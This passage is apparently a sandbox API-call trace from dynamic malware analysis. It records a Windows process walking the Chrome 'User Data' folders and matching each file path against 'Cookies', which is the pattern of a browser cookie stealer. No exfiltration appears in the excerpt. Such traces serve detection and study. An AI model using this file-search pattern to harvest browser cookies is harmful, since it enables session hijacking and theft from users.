returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0163.003] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.003] GetProcessHeap () returned 0x8e0000 [0163.003] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.003] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 57 [0163.003] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 57 [0163.003] lstrlenW (lpString="\\*.*") returned 4 [0163.003] GetProcessHeap () returned 0x8e0000 [0163.003] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7c) returned 0x926360 [0163.003] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0163.003] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*" [0163.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x58, dwReserved1=0x10000010, cFileName=".", cAlternateFileName="")) returned 0x8f9a40 [0163.003] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.004] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="..", cAlternateFileName="")) returned 1 [0163.004] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.004] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.004] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 1 [0163.004] lstrcmpiW (lpString1="User Data", lpString2=".") returned 1 [0163.004] lstrcmpiW (lpString1="User Data", lpString2="..") returned 1 [0163.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 57 [0163.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 57 [0163.004] lstrlenW (lpString="\\") returned 1 [0163.004] GetProcessHeap () returned 0x8e0000 [0163.004] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x76) returned 0x8eff30 [0163.004] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0163.004] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\" [0163.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\") returned 58 [0163.004] lstrlenW (lpString="User Data") returned 9 [0163.004] GetProcessHeap () returned 0x8e0000 [0163.004] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x88) returned 0x9263e8 [0163.004] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\" [0163.004] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\", lpString2="User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0163.004] VirtualQuery (in: lpAddress=0x8eff30, lpBuffer=0x2df7f8, dwLength=0x1c | out: lpBuffer=0x2df7f8*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.004] GetProcessHeap () returned 0x8e0000 [0163.004] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8eff30 | out: hHeap=0x8e0000) returned 1 [0163.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.004] lstrlenW (lpString="\\*.*") returned 4 [0163.004] GetProcessHeap () returned 0x8e0000 [0163.004] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x926478 [0163.005] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0163.005] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0163.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0163.005] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.005] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.005] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.005] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.005] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CertificateTransparency", cAlternateFileName="CERTIF~1")) returned 1 [0163.005] lstrcmpiW (lpString1="CertificateTransparency", lpString2=".") returned 1 [0163.005] lstrcmpiW (lpString1="CertificateTransparency", lpString2="..") returned 1 [0163.005] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.005] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.005] lstrlenW (lpString="\\") returned 1 [0163.005] GetProcessHeap () returned 0x8e0000 [0163.005] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0163.005] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0163.005] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.005] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0163.005] lstrlenW (lpString="CertificateTransparency") returned 23 [0163.005] GetProcessHeap () returned 0x8e0000 [0163.005] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925360 [0163.005] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.005] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="CertificateTransparency" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0163.005] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.005] GetProcessHeap () returned 0x8e0000 [0163.005] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.006] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 91 [0163.006] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 91 [0163.006] lstrlenW (lpString="\\*.*") returned 4 [0163.006] GetProcessHeap () returned 0x8e0000 [0163.006] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925420 [0163.006] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0163.006] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*" [0163.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0163.006] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.006] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.006] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.006] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.006] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0163.006] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0163.007] VirtualQuery (in: lpAddress=0x925420, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.007] GetProcessHeap () returned 0x8e0000 [0163.007] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925420 | out: hHeap=0x8e0000) returned 1 [0163.007] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.007] GetProcessHeap () returned 0x8e0000 [0163.007] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0163.007] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crashpad", cAlternateFileName="")) returned 1 [0163.007] lstrcmpiW (lpString1="Crashpad", lpString2=".") returned 1 [0163.007] lstrcmpiW (lpString1="Crashpad", lpString2="..") returned 1 [0163.007] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.007] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.007] lstrlenW (lpString="\\") returned 1 [0163.007] GetProcessHeap () returned 0x8e0000 [0163.007] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0163.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0163.007] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.007] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0163.007] lstrlenW (lpString="Crashpad") returned 8 [0163.007] GetProcessHeap () returned 0x8e0000 [0163.007] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x925360 [0163.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.007] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0163.007] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.007] GetProcessHeap () returned 0x8e0000 [0163.007] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.007] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0163.007] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0163.007] lstrlenW (lpString="\\*.*") returned 4 [0163.007] GetProcessHeap () returned 0x8e0000 [0163.007] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa2) returned 0x925408 [0163.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0163.008] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*" [0163.008] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0163.008] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.008] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.008] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.008] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.008] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5beda0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="metadata", cAlternateFileName="")) returned 1 [0163.008] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0163.008] lstrlenW (lpString="\\") returned 1 [0163.008] GetProcessHeap () returned 0x8e0000 [0163.008] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9c) returned 0x9254b8 [0163.008] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0163.008] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0163.008] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 77 [0163.008] lstrlenW (lpString="metadata") returned 8 [0163.008] GetProcessHeap () returned 0x8e0000 [0163.008] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xac) returned 0x925560 [0163.008] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0163.008] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", lpString2="metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" [0163.008] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.008] GetProcessHeap () returned 0x8e0000 [0163.008] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0163.009] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata", lpSrch="Cookies") returned 0x0 [0163.009] VirtualQuery (in: lpAddress=0x925560, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.009] GetProcessHeap () returned 0x8e0000 [0163.009] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925560 | out: hHeap=0x8e0000) returned 1 [0163.009] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="reports", cAlternateFileName="")) returned 1 [0163.009] 